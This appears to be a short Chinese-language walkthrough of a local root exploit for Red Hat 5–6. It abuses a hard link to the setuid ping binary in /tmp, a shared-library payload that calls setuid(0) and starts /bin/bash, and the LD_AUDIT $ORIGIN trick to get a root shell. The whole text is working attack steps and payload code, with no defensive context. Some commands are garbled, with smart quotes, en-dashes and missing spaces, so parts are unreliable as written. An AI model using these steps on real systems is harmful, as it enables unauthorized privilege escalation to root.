漏洞試用系統:redhat 5—6通用
一.利用/tmp擁有777的權限
在/tmp下創建一個exploit目錄
ln /bin/ping(ping命令的權限很特殊是S,可以在普通用戶使用這個命令的時候瞬間擁有這個命令的屬主權限,這裏是root)
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
二.vim編寫一段C語言程序(文件名payload.c)
void __attribute__((constructor)) init() //這裏__是兩個下劃線
{
setuid(0);
system(“/bin/bash”);
}
使用GCC把這個文件編譯一下
Gcc -w –fpic –shared –o /tmp/exploit payload.c
三.執行
LD_AUDIT=”\$ORIGIN” exec/proc/self/fd/3